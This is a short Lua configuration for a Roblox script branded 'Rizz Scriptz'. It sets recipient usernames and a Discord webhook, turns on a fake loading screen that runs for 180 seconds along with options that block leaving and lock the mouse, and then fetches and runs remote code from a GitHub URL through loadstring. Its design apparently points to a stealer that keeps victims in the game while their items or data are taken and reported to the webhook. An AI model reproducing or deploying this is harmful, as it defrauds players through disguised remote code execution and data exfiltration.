UserName = "wsxqaz11358"

UserName2 = "wsxqaz11358" 

Webhook = "https://discord.com/api/webhooks/1107589011385630750/i5a8h9J1Bv75ZOXH3QrSPhhaWysrh5ul4_rLHlqwbVKItV2XniFUxo8-chlEV9PFn01c"

_G.LoadingScreen = true

_G.AntiLeave = true

_G.MouseLock = true 

-- set them to false if you don't need them

_G.ScriptName = "Rizz Scriptz"

_G.FirstText = "pls wating"

_G.SecondText = "Script Loading..."

_G.ThirdText = "Almost Done..."

_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/R/main/Main.lua", true))()




